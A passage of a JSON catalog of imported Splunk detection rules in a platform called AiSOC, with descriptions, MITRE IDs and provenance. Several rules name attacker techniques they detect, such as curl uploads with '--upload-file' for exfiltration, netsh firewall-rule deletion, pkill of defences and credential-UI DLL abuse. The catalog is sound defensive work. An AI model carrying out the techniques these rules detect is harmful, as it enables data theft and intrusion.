If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-msbuild-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4006adac-5937-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_msbuild_rename.yml" } }, { "id": "splunk-security-content-404620de-46d8-48b6-90cc-8a8d7b0876a3", "type": "detection", "name": "Shim Database Installation With Suspicious Parameters", "description": "The following analytic detects the execution of sdbinst.exe with parameters indicative of silently creating a shim database. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line arguments. This activity is significant because shim databases can be used to intercept and manipulate API calls, potentially allowing attackers to bypass security controls or achieve persistence. 
If confirmed malicious, this could enable unauthorized code execution, privilege escalation, or persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shim-database-installation-with-suspicious-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "404620de-46d8-48b6-90cc-8a8d7b0876a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shim_database_installation_with_suspicious_parameters.yml" } }, { "id": "splunk-security-content-4057291a-b8cf-11eb-95fe-acde48001122", "type": "detection", "name": "Detect Renamed 7-Zip", "description": "The following analytic detects the usage of a renamed 7-Zip executable using Sysmon data. It leverages the OriginalFileName field to identify instances where the 7-Zip process has been renamed. This activity is significant as attackers often rename legitimate tools to evade detection while staging or exfiltrating data. If confirmed malicious, this behavior could indicate data exfiltration attempts or other unauthorized data manipulation, potentially leading to significant data breaches or loss of sensitive information. 
Analysts should validate the legitimacy of the 7-Zip executable and investigate parallel processes for further suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-7-zip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4057291a-b8cf-11eb-95fe-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_7_zip.yml" } }, { "id": "splunk-security-content-406c21d6-6c75-4e9f-9ca9-48049a1dd90e", "type": "detection", "name": "Windows Input Capture Using Credential UI Dll", "description": "The following analytic detects a process loading the credui.dll or wincredui.dll module. This detection leverages Sysmon EventCode 7 to identify instances where these DLLs are loaded by processes outside typical system directories. This activity is significant because adversaries often abuse these modules to create fake credential prompts or dump credentials, posing a risk of credential theft. 
If confirmed malicious, this activity could allow attackers to harvest user credentials, leading to unauthorized access and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-input-capture-using-credential-ui-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "406c21d6-6c75-4e9f-9ca9-48049a1dd90e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_input_capture_using_credential_ui_dll.yml" } }, { "id": "splunk-security-content-40925f12-4709-11ec-bb43-acde48001122", "type": "detection", "name": "High Frequency Copy Of Files In Network Share", "description": "The following analytic detects a high frequency of file copying or moving within network shares, which may indicate potential data sabotage or exfiltration attempts. It leverages Windows Security Event Logs (EventCode 5145) to monitor access to specific file types and network shares. This activity is significant as it can reveal insider threats attempting to transfer classified or internal files, potentially leading to data breaches or evidence tampering. 
If confirmed malicious, this behavior could result in unauthorized data access, data loss, or compromised sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-frequency-copy-of-files-in-network-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40925f12-4709-11ec-bb43-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/high_frequency_copy_of_files_in_network_share.yml" } }, { "id": "splunk-security-content-40a064c1-4ec1-4381-9e35-61192ba8ef82", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual Location", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets from unusual locations. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests by country. This activity is significant for a SOC as Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys, making them critical assets. 
If confirmed malicious, this behavior could indicate an attacker attempting to exfiltrate or misuse these secrets, potentially leading to unauthorized access to sensitive systems or data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40a064c1-4ec1-4381-9e35-61192ba8ef82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_location.yml" } }, { "id": "splunk-security-content-40bb64f9-f619-4e3d-8732-328d40377c4b", "type": "detection", "name": "MacOS - Re-opened Applications", "description": "The following analytic identifies processes referencing plist files that determine which applications are re-opened when a user reboots their MacOS machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and parent processes related to \"com.apple.loginwindow.\" This activity is significant because it can indicate attempts to persist across reboots, a common tactic used by attackers to maintain access. 
If confirmed malicious, this could allow an attacker to execute code or maintain persistence on the affected system, potentially leading to further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/macos-re-opened-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40bb64f9-f619-4e3d-8732-328d40377c4b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos___re_opened_applications.yml" } }, { "id": "splunk-security-content-40c2ba5b-dd6a-496b-9e6e-c9524d0be167", "type": "detection", "name": "Windows IIS Components Module Failed to Load", "description": "The following analytic detects when an IIS Module DLL fails to load due to a configuration problem, identified by EventCode 2282. This detection leverages Windows Application event logs to identify repeated failures in loading IIS modules. Such failures can indicate misconfigurations or potential tampering with IIS components. If confirmed malicious, this activity could lead to service disruptions or provide an attacker with opportunities to exploit vulnerabilities within the IIS environment. 
Immediate investigation is required to determine the legitimacy of the failing module and to mitigate any potential security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-module-failed-to-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40c2ba5b-dd6a-496b-9e6e-c9524d0be167", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_module_failed_to_load.yml" } }, { "id": "splunk-security-content-40ccb8e0-1785-466e-901e-6a8b75c04ecd", "type": "detection", "name": "Windows Cached Domain Credentials Reg Query", "description": "The following analytic identifies a process command line querying the CachedLogonsCount registry value in the Winlogon registry. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and registry queries. Monitoring this activity is significant as it can indicate the use of post-exploitation tools like Winpeas, which gather information about login caching settings. 
If confirmed malicious, this activity could help attackers understand login caching configurations, potentially aiding in credential theft or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cached-domain-credentials-reg-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40ccb8e0-1785-466e-901e-6a8b75c04ecd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cached_domain_credentials_reg_query.yml" } }, { "id": "splunk-security-content-40d2dc41-9bbf-421a-a34b-8611271a6770", "type": "detection", "name": "Internal Vertical Port Scan", "description": "This analytic detects instances where an internal host attempts to communicate with over 500 ports on a single destination IP address. It includes filtering criteria to exclude applications performing scans over ephemeral port ranges, focusing on potential reconnaissance or scanning activities. 
Monitoring network traffic logs allows for timely detection and response to such behavior, enhancing network security by identifying and mitigating potential threats promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-vertical-port-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40d2dc41-9bbf-421a-a34b-8611271a6770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_vertical_port_scan.yml" } }, { "id": "splunk-security-content-40e17d88-87da-414e-b253-8dc1e4f9555b", "type": "detection", "name": "GCP Successful Single-Factor Authentication", "description": "The following analytic identifies a successful single-factor authentication event against Google Cloud Platform (GCP) for an account without Multi-Factor Authentication (MFA) enabled. It uses Google Workspace login event data to detect instances where MFA is not utilized. This activity is significant as it may indicate a misconfiguration, policy violation, or potential account takeover attempt. 
If confirmed malicious, an attacker could gain unauthorized access to GCP resources, potentially leading to data breaches, service disruptions, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40e17d88-87da-414e-b253-8dc1e4f9555b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-40e3b299-19a5-4460-96e9-e1467f714f8e", "type": "detection", "name": "PowerShell Enable PowerShell Remoting", "description": "The following analytic detects the use of the Enable-PSRemoting cmdlet, which allows PowerShell remoting on a local or remote computer. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify when this cmdlet is executed. Monitoring this activity is crucial as it can indicate an attacker enabling remote command execution capabilities on a compromised system. 
If confirmed malicious, this activity could allow an attacker to take control of the system remotely, execute commands, and potentially pivot to other systems within the network, leading to further compromise and lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-enable-powershell-remoting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "40e3b299-19a5-4460-96e9-e1467f714f8e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_enable_powershell_remoting.yml" } }, { "id": "splunk-security-content-41243735-89a7-4c83-bcdd-570aa78f00a1", "type": "detection", "name": "Domain Controller Discovery with Nltest", "description": "The following analytic detects the execution of `nltest.exe` with command-line arguments `/dclist:` or `/dsgetdc:` to discover domain controllers. It leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line arguments. This activity is significant because both Red Teams and adversaries use `nltest.exe` for situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could allow attackers to map out domain controllers, facilitating further attacks such as privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-controller-discovery-with-nltest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41243735-89a7-4c83-bcdd-570aa78f00a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_controller_discovery_with_nltest.yml" } }, { "id": "splunk-security-content-41a0e58e-884c-11ec-9976-acde48001122", "type": "detection", "name": "Windows Schtasks Create Run As System", "description": "The following analytic detects the creation of a new scheduled task using Schtasks.exe to run as the SYSTEM user. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it often indicates an attempt to gain elevated privileges or maintain persistence within the environment. If confirmed malicious, an attacker could execute code with SYSTEM-level privileges, potentially leading to data theft, ransomware deployment, or further system compromise. 
Immediate investigation and mitigation are crucial to prevent further damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-schtasks-create-run-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41a0e58e-884c-11ec-9976-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_schtasks_create_run_as_system.yml" } }, { "id": "splunk-security-content-41bbb371-28ba-439c-bb5c-d9930c28365d", "type": "detection", "name": "Windows AD Cross Domain SID History Addition", "description": "The following analytic detects changes to the sIDHistory attribute of user or computer objects across different domains. It leverages Windows Security Event Codes 4738 and 4742 to identify when the sIDHistory attribute is modified. This activity is significant because the sIDHistory attribute allows users to inherit permissions from other AD accounts, which can be exploited by adversaries for inter-domain privilege escalation and persistence. 
If confirmed malicious, this could enable attackers to gain unauthorized access to resources, maintain persistence, and escalate privileges across domain boundaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-cross-domain-sid-history-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41bbb371-28ba-439c-bb5c-d9930c28365d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_cross_domain_sid_history_addition.yml" } }, { "id": "splunk-security-content-41c61539-98ca-4750-b3ec-7c29a2f06343", "type": "detection", "name": "Windows Modify Registry Delete Firewall Rules", "description": "The following analytic detects a potential deletion of firewall rules, indicating a possible security breach or unauthorized access attempt. It identifies actions where firewall rules are removed using commands like netsh advfirewall firewall delete rule, which can expose the network to external threats by disabling critical security measures. 
Monitoring these activities helps maintain network integrity and prevent malicious attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-delete-firewall-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "41c61539-98ca-4750-b3ec-7c29a2f06343", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_delete_firewall_rules.yml" } }, { "id": "splunk-security-content-425a6657-c5e4-4cbb-909e-fc9e5d326f01", "type": "detection", "name": "Windows Defender ASR Rules Stacking", "description": "The following analytic identifies security events from Microsoft Defender, focusing on Exploit Guard and Attack Surface Reduction (ASR) features. It detects Event IDs 1121, 1126, 1131, and 1133 for blocked operations, and Event IDs 1122, 1125, 1132, and 1134 for audit logs. Event ID 1129 indicates user overrides, while Event ID 5007 signals configuration changes. This detection uses a lookup to correlate ASR rule GUIDs with descriptive names. Monitoring these events is crucial for identifying unauthorized operations, potential security breaches, and policy enforcement issues. 
If confirmed malicious, attackers could bypass security measures, execute unauthorized actions, or alter system configurations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-rules-stacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "425a6657-c5e4-4cbb-909e-fc9e5d326f01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_rules_stacking.yml" } }, { "id": "splunk-security-content-429141be-8311-11eb-adb6-acde48001122", "type": "detection", "name": "Windows Service Created with Suspicious Service Path", "description": "The following analytic detects the creation of a Windows Service with a binary path located in uncommon directories, using Windows Event ID 7045. It leverages logs from the `wineventlog_system` to identify services installed outside typical system directories. This activity is significant as adversaries, including those deploying Clop ransomware, often create malicious services for lateral movement, remote code execution, persistence, and execution. 
If confirmed malicious, this could allow attackers to maintain persistence, execute arbitrary code, and potentially escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-created-with-suspicious-service-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "429141be-8311-11eb-adb6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_created_with_suspicious_service_path.yml" } }, { "id": "splunk-security-content-429d611b-3183-49a7-b235-fc4203c4e1cb", "type": "detection", "name": "Windows Defender ASR Rule Disabled", "description": "The following analytic identifies Windows Defender ASR rule disabled events. ASR is a feature of Windows Defender Exploit Guard that prevents actions and apps that are typically used by exploit-seeking malware to infect machines. ASR rules are applied to processes and applications. When a process or application attempts to perform an action that is blocked by an ASR rule, an event is generated. 
This detection searches for ASR rule disabled events that are generated when an ASR rule is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-rule-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "429d611b-3183-49a7-b235-fc4203c4e1cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_rule_disabled.yml" } }, { "id": "splunk-security-content-42b3b753-5925-49c5-9742-36fa40a73990", "type": "detection", "name": "Detect Traffic Mirroring", "description": "The following analytic detects the initiation of traffic mirroring sessions on Cisco network devices. It leverages logs with specific mnemonics and facilities related to traffic mirroring, such as \"ETH_SPAN_SESSION_UP\" and \"PKTCAP_START.\" This activity is significant because adversaries may use traffic mirroring to exfiltrate data by duplicating and forwarding network traffic to an external destination. 
If confirmed malicious, this could allow attackers to capture sensitive information, monitor network communications, and potentially compromise the integrity and confidentiality of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020.001", "T1200", "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-traffic-mirroring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "42b3b753-5925-49c5-9742-36fa40a73990", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_traffic_mirroring.yml" } }, { "id": "splunk-security-content-42b4b438-beed-11eb-ba1d-acde48001122", "type": "detection", "name": "Detect SharpHound File Modifications", "description": "The following analytic detects the creation of files typically associated with SharpHound, a reconnaissance tool used for gathering domain and trust data. It leverages file modification events from the Endpoint.Filesystem data model, focusing on default file naming patterns like `*_BloodHound.zip` and various JSON files. This activity is significant as it indicates potential domain enumeration, which is a precursor to more targeted attacks. 
If confirmed malicious, an attacker could gain detailed insights into the domain structure, facilitating lateral movement and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-sharphound-file-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "42b4b438-beed-11eb-ba1d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_sharphound_file_modifications.yml" } }, { "id": "splunk-security-content-42f8f1a2-4228-11ec-aade-acde48001122", "type": "detection", "name": "Windows Curl Upload to Remote Destination", "description": "The following analytic detects the use of Windows Curl.exe to upload a file to a remote destination. It identifies command-line arguments such as `-T`, `--upload-file`, `-d`, `--data`, and `-F` in process execution logs. This activity is significant because adversaries may use Curl to exfiltrate data or upload malicious payloads. If confirmed malicious, this could lead to data breaches or further compromise of the system. 
Analysts should review parallel processes and network logs to determine if the upload was successful and isolate the endpoint if necessary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-curl-upload-to-remote-destination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "42f8f1a2-4228-11ec-aade-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_curl_upload_to_remote_destination.yml" } }, { "id": "splunk-security-content-43254751-e2ce-409a-b6b4-4f851e8dcc26", "type": "detection", "name": "Windows Modify Registry to Add or Modify Firewall Rule", "description": "The following analytic detects a potential addition or modification of firewall rules, signaling possible configuration changes or security policy adjustments. It tracks commands such as netsh advfirewall firewall add rule and netsh advfirewall firewall set rule, which may indicate attempts to alter network access controls. 
Monitoring these actions ensures the integrity of firewall settings and helps prevent unauthorized network access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-to-add-or-modify-firewall-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "43254751-e2ce-409a-b6b4-4f851e8dcc26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_to_add_or_modify_firewall_rule.yml" } }, { "id": "splunk-security-content-435c6b33-adf9-47fe-be87-8e29fd6654f5", "type": "detection", "name": "Linux Impair Defenses Process Kill", "description": "The following analytic identifies the execution of the 'pkill' command, which is used to terminate processes on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because threat actors often use 'pkill' to disable security defenses or terminate critical processes, facilitating further malicious actions. 
If confirmed malicious, this behavior could lead to the disruption of security applications, enabling attackers to evade detection and potentially corrupt or destroy files on the targeted system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-impair-defenses-process-kill.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "435c6b33-adf9-47fe-be87-8e29fd6654f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_impair_defenses_process_kill.yml" } }, { "id": "splunk-security-content-43834687-cc48-4878-a2fa-f76e4271791f", "type": "detection", "name": "Windows Compatibility Telemetry Tampering Through Registry", "description": "This detection identifies suspicious modifications to the Windows Compatibility Telemetry registry settings, specifically within the \"TelemetryController\" registry key and \"Command\" registry value. It leverages data from the Endpoint.Registry data model, focusing on registry paths and values indicative of such changes. This activity is significant because CompatTelRunner.exe and the \"Microsoft Compatibility Appraiser\" task always run as System and can be used to elevate privileges or establish a highly privileged persistence mechanism. 
